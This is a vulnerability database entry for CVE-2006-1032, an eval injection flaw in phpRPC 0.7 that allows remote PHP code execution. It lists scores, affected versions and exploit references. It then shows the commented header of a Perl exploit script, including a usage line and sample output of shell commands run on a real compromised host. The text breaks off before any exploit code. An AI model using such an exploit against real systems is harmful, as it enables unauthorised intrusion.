CVE-2006-1032

Published: 07/03/2006 Updated: 08/03/2011
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and previous versions, as used by runcms, exoops, and possibly other programs, allows remote malicious users to execute arbitrary PHP code via the base64 tag.

Vulnerable Product

phprpc phprpc 0.8

phprpc phprpc 0.9

phprpc phprpc 0.7

Exploits

phpRPC Remote Code Execution
Vendor: Robert Hoffman
Product: phpRPC
Version: <= 0.7
Website: sourceforge.net/projects/phprpc/
BID: 16833
CVE: CVE-2006-1032
OSVDB: 23514
SECUNIA: 19028
PACKETSTORM: 44267
Description: phpRPC is meant to be an easy to use xmlrpc library. phpRPC is greatly simplified with the use of database/rpc-proto ...

#!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC <= 0.7 commands execute exploit by LorD (www.ihs.ir)
#
#[IRAN HOMELAND SECURITY]$ uname -a;id;pwd
#Linux sc8-pr-web9.sourceforge.net 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i6 ...